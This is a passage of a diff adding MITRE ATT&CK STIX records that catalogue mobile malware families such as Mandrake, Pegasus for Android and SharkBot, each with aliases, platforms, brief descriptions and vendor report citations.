+ "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "created": "2017-10-25T14:48:41.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0315", + "external_id": "S0315" + }, + { + "source_name": "DualToy", + "description": "(Citation: PaloAlto-DualToy)" + }, + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Mandrake", + "oxide", + "briar", + "ricinus", + "darkmatter" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "type": "malware", + "created": "2020-07-15T20:20:58.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0485", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0485" + }, + { + "source_name": "oxide", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "briar", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "ricinus", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "darkmatter", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-09-11T15:52:12.097Z", + "name": "Mandrake", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.\n\n[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "X-Agent for Android", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "created": "2017-10-25T14:48:42.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0314", + "external_id": "S0314" + }, + { + "source_name": "X-Agent for Android", + "description": "(Citation: CrowdStrike-Android)" + }, + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Lukáš Štefanko, ESET" + ], + "x_mitre_aliases": [ + "DEFENSOR ID" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "type": "malware", + "created": "2020-06-26T15:12:39.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0479", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0479" + }, + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T20:16:31.850Z", + "name": "DEFENSOR ID", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim’s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android’s accessibility service.(Citation: ESET DEFENSOR ID) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "MazarBOT", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "created": "2017-10-25T14:48:40.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0303", + "external_id": "S0303" + }, + { + "source_name": "MazarBOT", + "description": "(Citation: Tripwire-MazarBOT)" + }, + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Ginp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "type": "malware", + "created": "2020-04-08T15:51:24.862Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0423", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0423" + }, + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-09-11T15:50:18.707Z", + "name": "Ginp", + "description": "[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "HummingWhale", + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "created": "2017-10-25T14:48:40.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0321", + "external_id": "S0321" + }, + { + "source_name": "HummingWhale", + "description": "(Citation: ArsTechnica-HummingWhale)" + }, + { + "source_name": "ArsTechnica-HummingWhale", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "eSurv" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "type": "malware", + "created": "2020-09-14T14:13:45.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0507", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0507" + }, + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T15:39:17.698Z", + "name": "eSurv", + "description": "[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-01T22:00:09.640Z", + "name": "TangleBot", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TangleBot" + ], + "type": "malware", + "id": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "created": "2023-02-28T21:39:52.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1069", + "external_id": "S1069" + }, + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Jörg Abraham, EclecticIQ" + ], + "x_mitre_aliases": [ + "Monokle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "type": "malware", + "created": "2019-09-04T14:28:14.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/software/S0407", + "source_name": "mitre-attack", + "external_id": "S0407" + }, + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-11-01T18:30:41.998Z", + "name": "Monokle", + "description": "[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Red Alert 2.0" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "type": "malware", + "created": "2020-12-14T14:52:02.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0539", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0539" + }, + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:52:20.822Z", + "name": "Red Alert 2.0", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViceLeaker", + "Triout" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "type": "malware", + "created": "2019-11-21T16:42:48.203Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0418", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0418" + }, + { + "source_name": "ViceLeaker", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "Triout", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." + } + ], + "modified": "2020-03-26T19:00:42.233Z", + "name": "ViceLeaker", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ofir Almkias, Cybereason" + ], + "x_mitre_aliases": [ + "FakeSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "type": "malware", + "created": "2020-09-15T15:18:11.971Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0509", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0509" + }, + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-10-06T20:09:57.659Z", + "name": "FakeSpy", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyDealer", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyDealer" + ], + "type": "malware", + "id": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0324", + "external_id": "S0324" + }, + { + "source_name": "SpyDealer", + "description": "(Citation: PaloAlto-SpyDealer)" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Concipit1248", + "Corona Updates" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "type": "malware", + "created": "2020-04-24T15:12:10.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0426", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0426" + }, + { + "source_name": "Corona Updates", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-30T18:30:05.787Z", + "name": "Concipit1248", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RuMMS", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "created": "2017-10-25T14:48:48.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0313", + "external_id": "S0313" + }, + { + "source_name": "RuMMS", + "description": "(Citation: FireEye-RuMMS)" + }, + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for Android", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for Android", + "Chrysaor" + ], + "type": "malware", + "id": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "created": "2017-10-25T14:48:41.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0316", + "external_id": "S0316" + }, + { + "source_name": "Pegasus for Android", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Chrysaor", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + }, + { + "source_name": "Google-Chrysaor", + "description": "Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. Retrieved April 16, 2017.", + "url": "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "FrozenCell" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "type": "malware", + "created": "2021-02-17T20:43:52.033Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0577", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0577" + }, + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-04-19T14:07:24.519Z", + "name": "FrozenCell", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "AndroidOS/MalLocker.B" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "type": "malware", + "created": "2020-10-29T18:41:49.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0524", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0524" + }, + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T18:41:49.272Z", + "name": "AndroidOS/MalLocker.B", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-02-28T21:05:57.018Z", + "name": "SharkBot", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "SharkBot" + ], + "type": "malware", + "id": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "created": "2023-01-18T19:44:52.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1055", + "external_id": "S1055" + }, + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RedDrop", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RedDrop" + ], + "type": "malware", + "id": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": 